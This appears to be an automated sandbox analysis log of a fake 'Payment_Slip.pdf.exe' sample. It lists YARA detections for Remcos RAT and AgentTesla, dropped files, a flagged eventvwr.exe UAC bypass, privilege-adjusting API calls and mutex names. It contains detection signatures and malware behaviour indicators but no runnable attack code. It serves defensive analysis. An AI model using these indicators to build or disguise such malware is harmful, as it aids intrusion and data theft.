Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: Payment_Slip.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mHTmhPhJy.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@33/34@6/7
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 14_2_004182CE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 11_2_00415C90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 16_2_00410DE1
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 17_2_00415C90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 14_2_00418758
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 11_2_0040E2E7
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource, 11_2_00419493
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_00418A00
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Mutant created: \Sessions\1\BaseNamedObjects\dEEtDNIXGrGLJw
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp2819.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Software\ 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Exe 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: (#G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: origmsc 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: H"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: exepath 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: H"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: exepath 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: licence 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: `"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Administrator 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: User 17_2_0040D3F0
Source: Payment_Slip.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Payment_Slip.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe System information queried: HandleInformation
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
